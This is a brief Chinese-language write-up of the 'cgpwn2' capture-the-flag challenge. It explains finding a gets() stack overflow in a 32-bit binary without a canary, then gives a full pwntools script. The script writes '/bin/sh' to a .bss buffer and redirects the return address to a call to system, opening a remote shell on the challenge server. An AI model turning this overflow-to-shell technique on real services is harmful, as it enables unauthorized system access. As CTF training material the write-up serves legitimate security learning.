cgpwn2
用Linux康康,是32位无金丝雀
放进ida32康康
看来就这个hello有点意思,点进去康康
一看下面有个gets函数,有思路了,点开s康康
查看堆栈
利用r溢出返回我们要的函数,康康函数表
这有个pwn函数,进去康康
system函数,给它一个/bin/sh
hello在bss段上,写进去一个/bin/sh
在最后get那溢出一次就行了
开始写脚本
from pwn import *
r = remote('111.198.29.45',51186)
target = 0x804855A
//pwn函数中call system语句的地址,也是我们构造的假的返回地址
binsh = 0x804A080
四.结果
//name区域的地址,我们向name区域输入/bin/sh,然后让这个地址作为system函数的
参数,完成system("/bin/sh")
payload = 'a' * 0x26 + 'bbbb' + p32(target) + p32(binsh)
//|填充栈|覆盖保存的exp的值|假的返回地址,指向call system|call system的参
数|
a = r.recvuntil('e\n')
r.sendline('/bin/sh')
a = r.recvuntil(':\n')
r.sendline(payload)
r.interactive()
get flag